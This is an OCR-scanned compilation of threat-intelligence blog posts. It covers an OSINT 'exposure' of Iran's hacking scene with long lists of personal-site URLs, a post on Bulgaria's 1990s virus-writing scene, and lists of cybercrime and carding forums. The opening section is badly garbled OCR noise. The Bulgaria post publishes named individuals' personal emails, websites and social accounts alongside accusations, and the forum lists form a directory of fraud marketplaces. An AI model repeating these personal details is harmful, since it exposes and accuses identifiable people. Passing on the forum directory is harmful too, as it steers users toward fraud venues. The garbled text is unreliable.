ee ee 
SS ing pernelee 

Ord Scie Be om tb IPSS tH 


- 

Hetil aDhye J gene 9 Mednge nd yd CI tly 
BaF go Deller 

Soy sine p fhe Bad ale Pm sia 
aio S Saying 

lpn hace per od athe all OP nal 
Ao Kay oprnerver Sesny 

hy hed per ELD aller one Toe ve 
faye ted Spd by Ke wt ot 

Saeed fee eh Rinne Uo Soe J whey AEN had 
PIAS ae apne tye ty aS Pn om 
yO tele ge 9 dite hm ie Mo al 
2 Sah rode oh Sgt 

Mage fo ane ee wt bot ath 

a eS pee ye pe Meme od le 
ay pam ppene 5 nie toe sy A od Sela 
pO Aw SS Ree 

Ta ge fae Ail soil & poet lade 
Sail 

JERE hago Jado ne gh Petey od BE pl pe 
oes tty Mier led gloat ork Se) rn 
Thy Bae dle al pea Sige Short | 5 ee tae le 
wept Sie J te od hired Sago Sat J tla 
Sin hy Aid Sle wee Seo tahetle ag FF pen pte! 
ig tale BS em ny EE oy ee gh Ja anlage 


7378 


7379 


7380 


7381 


7382 


* { 


r= 
ce 


>_> > 


= 
oo 


rc 


oe, #8 & & @ & 


ee ee ee 


7384 


7385 


[4] 


7386 


7387 


7391 


7392 


7393 


7394 


7395 


7396 


HaPPY Birthde¥ Gehrooz 


7397 


7402 


train.ashiyane.ir 


Ko eee — 


asniyane securty train center 


7403 


skye Bees er" 


om #2! 


7404 


7405 


7406 


WWW.PRESSTV.COM 


7407 


7408 


7412 


Cnt aig. 


wr 


sisctigre boob doiggthe 


y - 


ent 4 rte 
Since soins SP iphenindagF TS Oe 


7413 


ciuil we 


to has git cst 9 


7414 


train.ashiyane.ir 


IM9O GuaygJ8 pasiigs Gegw aU jl 
oP LAAVESVPE-F 


7415 


7416 


conerere rere rererererererererengrerery'? 


7417 


7418 


7422 


7423 


7424 


7425 


eastern sivas 


DA 


7426 


7427 


7432 


7433 


7434 


7435 


hi 
: 
A 


tes 


7436 


7437 


7441 


7442 


7443 


7444 


7445 


| a ia 
A558) 


papal ope 


op ar ond ee ey 


7446 


7450 


thainsashtyane.ir 
<< : 
Seu ol 5 Oygd Syl Spo 
39.45 Ls oblio 


190 ole go BA Cua Ow = 09S 69 pes Ga 


oP IAAVESVRE-S 


7451 


7452 


7453 


7454 


7455 


7456 


7457 


7461 


7462 


7463 


7464 


Shayan farhadi 


7465 


7466 


7467 


7472 


7473 


7474 


7475 


7477 


7478 


Nal qualy ja PP euch Catia! ailudl iis! agyS pag aakog yids 


ply SLi ay jlag jut ola .uwyiwa gy cloial cla nSit cuigl : cqudgo 


7479 


7483 


S983 AL0 Ls $9) 9 Steal ol ojo 0.5 Odpstd 0999 LOLS ys 
J92 IG Ho G jga gh Po 2093 GyljSp QyU 


QR. oP LAAVESVPE-9 


oslutT trol CaS pty sb jgoT alg = 


http://train.ashiyane.ir QO 


7484 


7485 


ST ATE a a 
(| it f i | 
| i i! | ieee) h | il I y i N aan) 
| rit | ; ‘i 
Lalit Hid’ 


7486 


r 
2 
: 
2 
¢ 
2 
a 
2 


d 


7487 


7488 


7492 


7493 


7494 


7495 


S9H by dlido old 29) 9 aural ole 0999 Sif Sy 


1M 95 JST PP Ouadhady 2095 £9 pb Ay jl 


\3 
Ns oP LAAVESVPE-$ 


dsl tol Sth jgcTsolp SP 


http://train.ashiyane.ir QO 


7496 


7497 


7501 


7502 


7503 


Sf by AAA GL _ $2999 Steal 5 99 99) Odpid 0989 GS 2 
we 2599 1G yp dy9)5 1093 GJS py Awl 


RK, oP LAAVESVPE-$ 


dalutT taiol OS ph jgoT solg => 


http://train.ashiyane.ir LP 


7504 


Bestesaess 


7505 


7511 


7512 


7513 


¢ One 


SS 5 a 


ENE OP oS 


7514 


7515 


a —~ 
al Tow 

*~ ’ 
vty 


NEG LP EG. 
are ‘ As "ONE Bo, i 


HON 


a 


ee 


ee 1074 


Pic 
. a= Ps 


YS 


7516 


7522 


7523 


7524 


7525 


7526 


7527 


7528 


Sample personally identifiable photos of Iranian Dark Coders Team: 


7533 


7534 


7535 


anaes . > = « ; 
ee 


«< 


pee 


Sample personally identifiable photos of SEPANTA Team: 


7536 


7537 


7538 


7339 


7540 


7541 


RAW 


U 


WEG 


7542 


7543 


7544 


7545 


7546 


7547 


7548 


7549 


7550 


7551 


Sample personally identifiable photos of Shakaf Digital Security Team: 


7552 


7553 


HB 538759358 


Sessa 


EON 
a ee 


a+ MOO | 


7554 


7555 


7556 


Ta57 


7558 


7559 


Stay tuned! 


. https://dl.packetstormsecurity.net/papers/general/Iran.rar 

. https: //unit-123.org/wp-content/uploads/2020/05/Dancho_Danchev_Analysis_Report_Iran_Hacking_Scene.rar 

. https: //ddanchev.blogspot.com/2019/01/exposing-irans-most- wanted. html 

. https://1.bp. blogspot .com/-nhcWeNgM03s/Xut1LDOpoKI/AAAAAAAAKeE/ALxI-Q5-k3wA387d7 cIUuCZp1KryfqiNQCLcBGAsYHQ 
/31600/unique2world_01.png 

5. https://1.bp. blogspot .com/-13Y6SIpHT18/XuuSB3JeusI /AAAAAAAAKho/f JG8f£LEFn1gK8LSdoOBmNkILwu2bik7F gCLcBGAsYHQ 
/31600/skychat_vhd. jpg 
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16.5 July 


16.5.1 Exposing Iran’s Hacking Scene and Hacking Ecosystem Major Web Site Repo- 
sitiories - An OSINT Analysis (2020-07-12 07:37) 


Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free. ‘ 
"Exposing Iran's Hacking Scene OSINT-Enaéfied and 
Technica gongstion Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1§ 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


Commercial Copy Available! Approach me toda 
jpprpach yo fr Manager today' Empower your Threat 
religence eam! An OSINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


Dear blog readers, 


| wanted to take the time and effort and present the findings including an excerpt from 
my most recently released and freely available report on Iran’s Hacking Scene and Hacking 
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Ecosystem which is a complimentary Technical Collection research based analysis sponsored 
and requested by Wallmart Threat Intelligence team for the purpose of actively gathering ac- 
tionable intelligence on Iran’s Hacking Scene and Hacking Ecosystem and actually distributing 
it online for free making it one of the most comprehensive and extensive publicly accessible 
research analysis on Iran’s Hacking Scene and Iran’s Hacking Ecosystem. 


In this post I’ll present the findings including personally identifiable photos of major Iran- 
based hacking groups and threat actors including all the currently active Iran-based personal 
Web sites belonging to individual Iran-based hackers and hacking groups including personal 
Web sites of some of the team members of some of Iran’s leading and major hacking and 
Web site defacement groups with the idea to assist the Security Industry the U.S Intelligence 
Community and U.S Law Enforcement on its way to track down and prosecute the individuals 
behind these campaigns part of my most recently released and publicly accessible report on 
Iran’s hacking scene and hacking ecosystem. 


Recommended posts and research reports: 


[1]Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Repub- 
lic of Iran - Report - Direct Download Copy 


[2]A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking 
Scene Through the Prism of the Infamous Ashiyane Digital Security Team - Direct Download 


Copy 


[3]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis 


Sample personally identifiable photos collected using Technical Collection of currently 
active major and individual Iran-based hacking groups and team members of leading and 
major Iran-based hacking groups: 
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Sample Iran-based personal Web site URLs of Iran-based hacking groups and team members 
of Iran’s leading and major hacking and Web site defacement groups: 


hxxp://a74462.persiangig.com 
hxxp://abbas-virus.persiangig.com 
hxxp://abdrezaha.persiangig.com 
hxxp://adamforush.persiangig.com 
hxxp://afeel.persiangig.com 
hxxp://afgar753.persiangig.com 
hxxp://afr-computer.persiangig.com 
hxxp://afsaran-agrab.persiangig.com 
hxxp://afshin111.persiangig.com 
hxxp://agh45.persiangig.com 
hxxp://ahwazdownload.persiangig.com 
hxxp://akams.persiangig.com 
hxxp://alOn3-m4n.persiangig.com 
hxxp://albert.persiangig.com 


hxxp://ali-danger.persiangig.com 
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hxxp://ali0123.persiangig.com 
hxxp://ali486.persiangig.com 
hxxp://aliclop.persiangig.com 
hxxp://alierrorl.persiangig.com 
hxxp://alijojo.persiangig.com 
hxxp://alipcl.persiangig.com 
hxxp://alireza5800.persiangig.com 
hxxp://alirezabiyal.persiangig.com 
hxxp://alirezashiri.persiangig.com 
hxxp://alirezaxxl.persiangig.com 
hxxp://alisoft.persiangig.com 
hxxp://alvlin.persiangig.com 
hxxp://am-tools.persiangig.com 
hxxp://amarok.persiangig.com 
hxxp://amin77.persiangig.com 
hxxp://aminsheikha.persiangig.com 
hxxp://amir-666.persiangig.com 
hxxp://amir-pw.persiangig.com 
hxxp://amir23.persiangig.com 
hxxp://amirhossein021.persiangig.com 
hxxp://amirjustfriend.persiangig.com 
hxxp://amirmansoury.persiangig.com 
hxxp://amirsalartavakoli.persiangig.com 
hxxp://amolhackers.persiangig.com 


hxxp://anatema.persiangig.com 
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hxxp://anax2x.persiangig.com 
hxxp://androidpoor.persiangig.com 
hxxp://anonyr3z4.persiangig.com 
hxxp://anti-network.persiangig.com 
hxxp://antichat.persiangig.com 
hxxp://antifilterby4ull-hacker.ht 
hxxp://anzalichi.persiangig.com 
hxxp://apexpredator.persiangig.com 
hxxp://applexxe.persiangig.com 
hxxp://aragh.persiangig.com 
hxxp://arazdownloadpg.persiangig.com 
hxxp://arefmaramazi.persiangig.com 
hxxp://aria-security.persiangig.com 
hxxp://arianismmm.persiangig.com 
hxxp://ario-barzan.persiangig.com 
hxxp://arman98.persiangig.com 
hxxp://armaninvisible.persiangig.com 
hxxp://armingame.persiangig.com 
hxxp://armintanha.persiangig.com 
hxxp://artenis.persiangig.com 
hxxp://arvineasthackers.persiangig.com 
hxxp://ashitor.persiangig.com 
hxxp://ashkanan3.persiangig.com 
hxxp://asm952.persiangig.com 


hxxp://atrix.persiangig.com 
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hxxp://attack.persiangig.com 
hxxp://avadakedavra.persiangig.com 
hxxp://aware.persiangig.com 
hxxp://b-i-o-s.persiangig.com 
hxxp://b3ylux3.persiangig.com 
hxxp://bachebahal.persiangig.com 
hxxp://badjen3.persiangig.com 
hxxp://bahman666.persiangig.com 
hxxp://bamiran.persiangig.com 
hxxp://bardiajoon.persiangig.com 
hxxp://barnamehnevesy.persiangig.com 
hxxp://beat20.persiangig.com 
hxxp://behfaraz.persiangig.com 
hxxp://behzadmesri.persiangig.com 
hxxp://best-gold.persiangig.com 
hxxp://bestbset. persiangig.com 
hxxp://bia2bestfile.persiangig.com 
hxxp://bia2music2.persiangig.com 
hxxp://bia2saadi.persiangig.com 
hxxp://bia2takmusic.persiangig.com 
hxxp://big-killer.persiangig.com 
hxxp://bigb4ng.persiangig.com 
hxxp://bijism.persiangig.com 
hxxp://bimbim.persiangig.com 


hxxp://biologystudentshirazu.persiangig.com 
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hxxp://black-shadow.persiangig.com 
hxxp://blackcap.persiangig.com 
hxxp://blackdata.persiangig.com 
hxxp://blackfox.persiangig.com 
hxxp://blackh4t.persiangig.com 
hxxp://blacklast.persiangig.com 
hxxp://blackportal.persiangig.com 
hxxp://blackwizardmagician.persiangig.com 
hxxp://blogskin.persiangig.com 
hxxp://om98511.persiangig.com 
hxxp://b000000ote.persiangig.com 
hxxp://boromir.persiangig.com 
hxxp://boxochi.persiangig.com 
hxxp://brainbOy.persiangig.com 
hxxp://bulurp.persiangig.com 
hxxp://cOderl.persiangig.com 
hxxp://catcOnfig.persiangig.com 
hxxp://ceh2010.persiangig.com 
hxxp://cenator-vb.persiangig.com 
hxxp://chater.persiangig.com 
hxxp://ciph3r.persiangig.com 
hxxp://civilz.persiangig.com 
hxxp://codez.persiangig.com 
hxxp://coldfire.persiangig.com 


hxxp://coldn.persiangig.com 
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hxxp://comonism.persiangig.com 
hxxp://computer-lab2.persiangig.com 
hxxp://cover-weblog.persiangig.com 
hxxp://cr4ck3r.persiangig.com 
hxxp://cr4zylov3r.persiangig.com 
hxxp://craft.persiangig.com 
hxxp://crim3r.persiangig.com 
hxxp://csundragon.persiangig.com 
hxxp://cyberboys.persiangig.com 
hxxp://cyberdevilz.persiangig.com 
hxxp://cybersaboteur.persiangig.com 
hxxp://d3f4c3r.persiangig.com 
hxxp://d3structlv3.persiangig.com 
hxxp://d4rvi5hi.persiangig.com 
hxxp://d4wood.persiangig.com 
hxxp://dad4mahan.persiangig.com 
hxxp://daimon74.persiangig.com 
hxxp://dangerman.persiangig.com 
hxxp://dangerous-hacker.persiangig.com 
hxxp://darkcoder.persiangig.com 
hxxp://darkhastdotnet.persiangig.com 
hxxp://darkhastdotnet2.persiangig.com 
hxxp://darknessxxl.persiangig.com 
hxxp://darkunder.persiangig.com 


hxxp://darkwitch.persiangig.com 
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hxxp://datacoders.persiangig.com 
hxxp://datairan.persiangig.com 
hxxp://datawar.persiangig.com 
hxxp://deface.persiangig.com 
hxxp://defaced.persiangig.com 
hxxp://delsa.persiangig.com 
hxxp://delta-hacker.persiangig.com 
hxxp://destroyerh3ll.persiangig.com 
hxxp://devilzcOder.persiangig.com 
hxxp://diagramm.persiangig.com 
hxxp://dialup-download.persiangig.com 
hxxp://diazpamel10.persiangig.com 
hxxp://diedloves.persiangig.com 
hxxp://di1-security-network.persiangig.com 
hxxp://dl4-downloadfa.persiangig.com 
hxxp://dorsaazari.persiangig.com 
hxxp://dostetdarammaa.persiangig.com 
hxxp://dotaallstars.persiangig.com 
hxxp://downloadestan5.persiangig.com 
hxxp://dr-h4ck3r.persiangig.com 
hxxp://dr-root.persiangig.com 
hxxp://drduger.persiangig.com 
hxxp://drmaster.persiangig.com 
hxxp://drwxrwxrwx.persiangig.com 


hxxp://dwast.persiangig.com 
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hxxp://e3mail.persiangig.com 
hxxp://ehsan-empire.persiangig.com 
hxxp://ehsan6206.persiangig.com 
hxxp://ehsanmae.persiangig.com 
hxxp://ekrami01.persiangig.com 
hxxp://ekramil0.persiangig.com 
hxxp://ekrami3.persiangig.com 
hxxp://elyarz.persiangig.com 
hxxp://encOd3r.persiangig.com 
hxxp://encoder.persiangig.com 
hxxp://engineer-sniper.persiangig.com 
hxxp://erfanx2x.persiangig.com 
hxxp://erfxn.persiangig.com 
hxxp://error-back-x9.persiangig.com 
hxxp://esfahan-security.persiangig.com 
hxxp://eshraq.persiangig.com 
hxxp://esmaeilpoor.persiangig.com 
hxxp://esmailapps.persiangig.com 
hxxp://esoft.persiangig.com 
hxxp://essaji.persiangig.com 
hxxp://esshop.persiangig.com 
hxxp://ettefaghi.persiangig.com 
hxxp://evilshadow.persiangig.com 
hxxp://eximor.persiangig.com 


hxxp://ezami.persiangig.com 
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hxxp://far30tools.persiangig.com 
hxxp://faraz4u.persiangig.com 
hxxp://farbodezrael.persiangig.com 
hxxp://farbodmahini.persiangig.com 
hxxp://farhad242.persiangig.com 
hxxp://faridmafia.persiangig.com 
hxxp://fatalking.persiangig.com 
hxxp://fazel-fbi.persiangig.com 
hxxp://fazilamiry.persiangig.com 
hxxp://fobiyght76.persiangig.com 
hxxp://fcbwin.persiangig.com 
hxxp://fdownloadir.persiangig.com 
hxxp://fghjjh.persiangig.com 
hxxp://firebaxe.persiangig.com 
hxxp://freelogo.persiangig.com 
hxxp://frees.persiangig.com 
hxxp://fulltarh.persiangig.com 
hxxp://fun4ir.persiangig.com 
hxxp://gOld-soft.persiangig.com 
hxxp://g3n3rall-blackhat.persiangig.com 
hxxp://galar2.persiangig.com 
hxxp://galebsaz.persiangig.com 
hxxp://game22009.persiangig.com 
hxxp://gha3dak.persiangig.com 


hxxp://ghalebkade.persiangig.com 
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hxxp://ghased2006.persiangig.com 
hxxp://ghayegh-khali.persiangig.com 
hxxp://gigmohsen.persiangig.com 
hxxp://gikgik.persiangig.com 
hxxp://gold-sOft.persiangig.com 
hxxp://gold33.persiangig.com 
hxxp://golpaboyz.persiangig.com 
hxxp://goord.persiangig.com 
hxxp://gorosneh.persiangig.com 
hxxp://groupsyahoo.persiangig.com 
hxxp://gta5edit.persiangig.com 
hxxp://gtaimages.persiangig.com 
hxxp://h-team.persiangig.com 
hxxp://h3x73l.persiangig.com 
hxxp://h3xbOyz.persiangig.com 
hxxp://h4ck-tools.persiangig.com 
hxxp://h4ckerr.persiangig.com 
hxxp://h4med.persiangig.com 
hxxp://nacker.persiangig.com 
hxxp://nackeran99.persiangig.com 
hxxp://nackerashiyane.blogfa.com 
hxxp://nackreza.persiangig.com 
hxxp://nadihadi.persiangig.com 
hxxp://haftevigarl.persiangig.com 


hxxp://hakaki.persiangig.com 


7777 


hxxp://nhakha.persiangig.com 
hxxp://hali3eyyedh.persiangig.com 
hxxp://ham3chi.persiangig.com 
hxxp://haman313.persiangig.com 
hxxp://nhamed-qcc.persiangig.com 
hxxp://nhamedanno.persiangig.com 
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Stay tuned! 
1. https://dl.packetstormsecurity .net/papers/general/Iran.ra 


2. https://unit-123.org/wp-content/uploads/2020/05/Dancho_Danchev_Analysis_Report_Iran_Hacking Scene.ra 


3. https://ddanchev. blogspot .com/2019/01/exposing-irans-most-wanted.htm 


16.5.2 Exposing Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC 
and Build a Fake Pro-Western Empire? - An OSINT Analysis (2020-07-13 19:52) 


Dear blog readers, 


| wanted to take the time and effort and personally present the "crown jewels" of my research 
into [1]Bulgaria’s involvement in Cold War Espionage in the context of writing and distributing 
computer viruses using educational institutions as a front-end to spread and disseminate 
computer viruses and actually participate in a variety of high-profile hacking phreaking and 
cracking project throughout the 90’s perfectly fitting and violating the [2]COCOM embargo 
imposed by the United States during the Cold War. 


Sample SNA (Social Network Analysis) of key participants in Bulgaria’s virii writing and 
hacking scene throughout the 90’s: 
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Sample personally identifiable information for Georgi Guninski: 
Personal Email: guninski@guninski.com 

Personal Email: gguninski@gmail.com 

Personal Web Site: http://www.guninski.com/ 


Personal Web Site: https://j.ludost.net/ 


Sample personally identifiable photos of Georgi Guninski: 
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Sample personally identifiable information for Daniel Kalchev a.k.a Kohntark: 


Twitter account: https://twitter.com/danielkalchev 


Sample personally identifiable photos of Daniel Kalchev a.k.a Kohntark: 


Sample Historical OSINT Analysis Photos of Key Figures of Bulgaria’s glorious virii writing 
and hacking years circa the 90’s: 


7815 


7816 


7817 


7818 


7819 


7820 


Sample Photos of Pravetz-16 - an IBM Clone: 
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B xuGuiteTa ne KOMMOTEpHO oGyseHHe B CTOZIMINMA TeEXHHKYM 
fo checrpomma BM. Jlenen 


Sample Photos of Veni Markovski: 
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Sample Photos of Kosio Spirov: 
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Stay tuned! 


1. http://cryptome. org/2015/04/bn-sec/bn-state-security.htm 


2. https://en.wikipedia.org/wiki/Coordinating_Committee_for_Multilateral_Export_Controls 


3. http://cryptome.org/2015/04/bn-sec/SBORNIK- 13. pdf 


16.5.3 Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Ac- 
tive Cyberfrime-Friendly Forum Communities - Part Two (2020-07-17 15:04) 
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Dear blog readers, 


This is the second post part of the "[1]JA Compilation of Currently Active Cyberfrime-Friendly 
Forum Communities" blog post series part of my currently ongoing [2]Law Enforcement and 
OSINT operation "[3]Uncle George" that aims to empower your team or organization with the 
necessary Technical Collection data to help you fight against cybercrime incidents including 
the U.S Intelligence Community and U.S Law Enforcement with the necessary information to 
track down shut down and prosecute the cybercriminals behind these campaigns. 


Currently active portfolio of cybercrime-friendly invite-only and publicly accessible fo- 
rum communities: 


http://forum.ahack.ru 
http://lampeduza.la/ 


https://freehacks.ru/ 
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http://www.badkarma.ru/ 
http://webmasters.ru/forum/ 
http://seo-forum.ru 
https://seolik.ru 
http://forum.linkfeed.ru 
https://sky-fraud.ru 
https://nhappy-hack.ru/forum 
http://psh-world.ru/ 
https://freehacks.ru 
http://dark-side.su 
https://chf.su/ 
http://www.bpcforums.su 
https://vlmi.su/ 
https://forum.xakepok.net 
https://werb-ung.su/ 
https://prologic.su/ 
https://procoder.su 
http://deepweb.su/ 
https://blacknet.su/ 
https://crdclub.su/ 
https://www.cardvilla.net/ 
https://caveiratech.com/forum/ 
http://www.darkers.com.br/forum 
https://www.xakep.bg/forum/ 


https://instant-hack.to 
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https://www.4hatday.com/forum 
http://www.forum-hacker.com.br 
http://forum.guiadohacker.com.br 
http://www. blackhatkings.com/ 
https://www.totalblackhat.net/ 
https://searchengines.guru/ 
http://www.szuwi.com/ 
https://mmgp.ru/ 
https://www.armadaboard.com/ 
https://www.maultalk.com/ 
https://www.gofuckbiz.com/ 
http://forum.sape.ru 
https://zismo.biz/ 
https://forum.zloy.bz 
http://forum-seo.net 
https://www.master-x.com/forum/ 
http://www.erun.ru/ 
http://forum.bigfozzy.com/ 
http://www.domenforum.org 
http://forum.sape.ru/ 
https://www.seocafe.info/ 
https://www.masterwebs.ru/ 
https://ceh.vn/[FORUM]/ 
http://svuit.vn/ 


https://whitehat.vn/ 
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https://gla.vn 
https://fl.133t.su/index.php?/login/ 
https://uniccshop.cm/forumdisplay.php?f=50 
https://prvtzone.ws/ 
https://hhide.su 

https://dwh.su/ 
https://crackingcentral.com 
https://zhyk.ru/forum/index.php 
https://talkwebber.ru/ 
https://searchengines.guru 
https://crdclub.su 
https://forum.uinsell.net 
https://blackhatworld.com 
https://whitehat.vn 
https://crack-forum.ru 
https://https://forum.antichat.ru 
www.master-x.com 
https://rstforums.com 
https://crackingportal.com 
https://www.hackzone.ru 
https://www.forum-hacker.com.br 
https://www.xakep.bg 
https://www.spyhackerz.com 
https://www.whitehat.vn 


https://golden-cc.ru 
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https://spyhackerz.com 
https://level23hacktools.com 
https://www.dute66.com 
https://exelab.ru 
https://sky-fraud.ru 
https://forum.eviloctal.com 
https://procrd.me 
https://www.cnhonkerarmy.com 
https://deepweb.su 
https://www.bpcforums.su 
https://hack-port.ru 
https://bpcforums.su 
https://criminalz.org 
https://www.ihonker.org 
https://www.blackhatprotools.info 
https://webmasters.ru 
https://www.reactos.org 
https://golden-cards.ru 
http://white-obnal.ru/ 
https://cardx.mx/ 
https://phreaker.pro/forum 
https://www.hackzone.ru/forum/ 
https://procrd.vc/ 
https://shadowmarket.vip/ 


https://prologic.su/ 
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http://proxy-base.com/ 
http://hackings.ru/forum/ 
https://www.gofuckbiz.com/ 
http://webmasters.ru/forum/ 
https://piratebuhta.pw/ 
https://ifud.ws/ 
https://nappy-hack.ru/forum 
https://sky-fraud.ru 
https://forum.antichat.ru/ 
http://forum.xakep.ru/ 
https://exelab.ru/f/ 
http://www.crack-forum.ru/ 
http://hack-port.ru/forum/ 
https://forum.zloy.bz/ 
https://procrd.me/ 
http://www.hackzone.ru/forum/ 
https://forum.hackersoft.ru/ 
https://freehacks.ru 
https://blackhacker.ru 
http://golden-cc.ru/ 
http://forum.uinsell.net/ 
https://prologic.su/ 
http://www.11wang.org/ 
http://www.365exe.com/ 


http://www.cnhonkerarmy.com/ 
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http://www. 110hack.com/ 
https://forum.cnsec.org/ 
https://www.dute66.com/ 
https://forum.eviloctal.com/ 
http://www.fankebase.com/ 
https://www.ihonker.org/ 
http://www.cardmafia.ws/ 
http://bitshacking.com 
http://www.bpcsquad.su 
http://carder.site/ 
https://sky-fraud.ru 
https://procrd.co/ 
http://blackcash.pw/ 
https://dublikat.one 
http://promarket.cc/ 
http://forum.benderbay.com/ 
http://cardingboard.net/ 
http://www. proxy-base.info 
https://prologic.su/ 
https://forum.antichat.ru/ 
http://thebot.net/ 
http://proxy-base.com/ 
https://csu.su/ 
https://damagelab.in/ 


https://forum.exploit.in/ 
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https://prologic.su/ 
https://prologic.su 
http://certificatshop.com/ 
http://forum.softxaker.ru/ 
https://fuckav.ru/ 
https://forum.zloy.bz/ 
http://darkmarket.la/ 
http://darknet.so/ 
https://prtship.com 
https://bhf.io 
https://opencard.pw/ 
https://forum.chknet.cc/ 
https://altenen.nz/forum/ 
https://www.turkhackteam.org/ 
https://crimeclub.biz/ 
https://darkmarket.website/ 
https://crdclub.cc/ 
http://crd.land/threads/ 
https://dark-time.life/ 
https://boveda.cc/ 
https://carder.me/ 
https://scamalert.online/ 
http://verified.re 
https://dublikat.im 


https://antipop.ru 
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http://kidala.com 
http://motorovoz.ru 
http://drop-usa.ru 
http://dark-bunker.org 
https://www.hackzone.ru/forum/ 
https://phreaker.pro/forum/ 
http://kriminal-guru.ru/ 
http://dropchik.ru/ 
http://spisok-kidal.ru/ 
http://devil-time.org/ 
http://falsh-obnal.ru/ 
http://obnal-cc.com/ 
http://top-carders.ru/ 
https://crackingboxxx.com/ 
https://blackstuffx.org/ 
https://www.blackhatprotools.info 
https://criminalz.org/ 
https://forum.koswog.com/ 
https://cyberlab.life/ 
https://crackingcentral.com 
https://crackingboxxx.com/ 
https://blackstuffx.org/ 
https://www.blackhatprotools.info 
https://criminalz.org/ 


https://forum.koswog.com/ 
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https://cyberlab.life/ 
https://crackingcentral.com 
http://white-obnal.ru/ 
https://procrd.vc/ 
https://shadowmarket.vip/ 
https://prologic.su/ 
http://darkmarket.la 
https://bhf.io/ 
http://white-obnal.ru/ 
https://cardx.mx/ 
https://phreaker.pro/forum 
https://www.hackzone.ru/forum/ 
https://procrd.vc/ 
https://shadowmarket.vip/ 
https://prologic.su/ 
http://proxy-base.com/ 
http://hackings.ru/forum/ 
https://www.gofuckbiz.com/ 
http://webmasters.ru/forum/ 
https://piratebuhta.pw/ 


https://ifud.ws/ 


Stay tuned! 


1. https: //ddanchev. blogspot .com/2020/07/exposing-modern-cybercrime-ecosystem_0.htm 
2. https://ddanchev. blogspot .com/2019/10/announcing-law-enforcement-and-osint.htm 
3. https://ddanchev. blogspot .com/2019/12/announcing-law-enforcement-and-osint.htm 
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16.5.4 Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Ac- 
tive Cyberfrime-Friendly Forum Communities - Part Three (2020-07-17 15:07) 
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Dear blog readers, 


This is the third post part of the "[1]A Compilation of Currently Active Cyberfrime-Friendly 
Forum Communities" blog post series part of my currently ongoing Law Enforcement and 
OSINT operation "Uncle George" that aims to empower your team or organization with the 
necessary Technical Collection data to help you fight against cybercrime incidents including 
the U.S Intelligence Community and U.S Law Enforcement with the necessary information to 
track down shut down and prosecute the cybercriminals behind these campaigns part of my 
currently ongoing [2]Law Enforcement and OSINT operation called "[3]Uncle George". 


Currently active portfolio of cybercrime-friendly invite-only and publicly accessible fo- 
rum communities: 
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https://dublikat.team/ 
https://www.toolba.se/board/ 
https://hackingboard.net/ 
https://forum.kuketz-blog.de/ 
https://high-minded.net/ 
https://www.szenebox.org/ 
https://forum.zwame.pt/ 
https://cryptr.org/index.php 
https://www.cyberizm.org/ 
https://raidforums.com/ 


https://spyhackerz.org/forum/ 


https://www.blackhatworld.com/ 


https://aiw.bz/ 
https://darkmoney.cm/ 
https://pinoytech.ph/ 
https://youhack.ru/ 
http://cardhouse.cc/ 
https://toxyzen.ru/ 
https://theplug45.am/ 
https://cdotws.pw/ 
http://toolzbox.cc/ 
http://fakedocs.cc/ 
https://cookiesandyou.com/ 
https://mybitmix.com/ 


https://mybitmix.com/ 
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https://stardumps24.com/ 
http://c2bit.xyz/ 
http://card24.shop/ 
https://carderbay.com/ 
http://cardhouse.cc/ 
https://cdotws.pw/ 
https://cdotws.pw/ 
https://stardumps24.com/ 
http://fakedocs.cc/ 
https://genozid.to/ 
https://goldenshop.cc/ 
http://jstash.domains/ 
http://luxecc.su/ 
http://luxecc.su/ 
https://rdd.pw/ 
https://www.richlogs.ru/ 
https://fullzinfo.com/ 
https://theplug45.am/ 
http://toolzbox.cc/ 
https://toxyzen.ru/ 
http://atlantis.cx/ 
http://blackcode.in/ 
http://coding4you.de/ 
http://crdcc.cc/ 


http://crimebiz.net/ 
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https://crimetime. biz/ 
http://darksters.cc/ 
http://fato.me/ 
https://fraud.to/ 
https://free-hack.com/ 
https://hackbase.cc/ 
https://hackingboard.net/ 
http://hacksector.com/ 
http://happy-security.de/ 
https://high-minded.net/ 
https://forum.kuketz-blog.de/ 
http://lawless-hackers.com/ 
http://school-of-hack.net/ 
http://secunet.cc/ 
https://szenebox.org/ 
https://toolba.se/ 
http://trading-network.to/ 
http://www.uniquecrew.net/ 
https://blackhat.al/ 
http://nackforums.al/ 
http://forum.itshgip.com/ 
http://shgipet-hack.do.am/ 
http://LOneen.com/ 
http://alkrsan.net/ 


http://aoreteam.com/ 
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http://arhack.net/ 
http://asdely.net/ 
http://dev-point.com/ 
http://ehack.info/ 
http://n4kurd.com/ 
http://hack-school.com/ 
http://hackteach.org/ 
http://is-sec.org/ 
http://forum.itsecteam.com/ 
http://l3zr.com/ 
http://lb-h.com/ 
http://mollaborjan.com/ 
http://mr11-11mr.70lm.org/ 
https://nullnoss.org/ 
http://ro0ot.com/ 
http://sa-hacker.com/ 
http://forum.sa3eka.com/ 
http://sec4ever.com/ 
http://forums.sogor.net/ 
http://sqebd.com/ 
https://sy-team.com/ 
http://tryag.cc/ 
http://vb4arb.com/ 
http://vbspiders.com/ 


http://www.x6x.net/ 
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https://anti-armenia.org/ 
http://az-security.org/ 
https://az-khaos.com/ 
http://ljuska.org/ 
http://bbs.11wang.org/ 
http://bbs.2cto.com/ 
http://52pojie.cn/ 


http://cctry.com/ 


https://club.chnlanker.com/ 


http://bbs.chnsuc.com/ 
http://cnhonkerarmy.com/ 
http://cnio.org/ 
http://forum.cnsec.org/ 


http://it.crfly.com/ 


https://forum.eviloctal.com/ 


http://freebuf.com/ 
http://bbs.hackbase.com/ 
http://hackdos.com/ 
http://hackerxfiles.net/ 
http://hanzify.org/ 
http://bbs.iceinternet.cn/ 
https://ihonker.org/ 
http://bbs.jiasule.com/ 
http://bbs.kafan.cn/ 


http://linux520.com/ 
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http://bbs.myhack58.com/ 
http://shell2me.com/ 
https://bbs.silic.wiki/ 
